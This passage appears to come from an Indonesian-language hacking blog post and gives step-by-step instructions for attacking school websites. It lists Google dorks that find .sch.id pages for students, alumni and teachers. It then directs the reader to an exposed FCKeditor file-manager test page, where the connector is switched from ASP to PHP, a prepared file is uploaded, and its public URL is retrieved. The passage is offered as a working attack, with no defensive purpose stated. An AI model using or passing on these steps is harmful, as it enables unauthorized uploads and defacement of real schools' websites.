2. Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
3. Exploit: /editor/filemanager/connectors/test.html
EX:
http://xxx.sch.id/html/siswa.php
http://xxx.sch.id/html/almni.php
http://xxx.sch.id/html/guru.php
*Sesuai Dork.
Ganti jadi:
http://xxxx/editor/filemanager/connectors/test.html
4. Ganti ASP jadi PHP.
5. Browse file txt yang sudah disiapkan -> open -> upload.
6. Hasilnya:
http://xxx.sch.id/userfiles/file/namafile.txt
http://xxx.sch.id/userfiles/namafile.txt
0 komentar:
Posting Komentar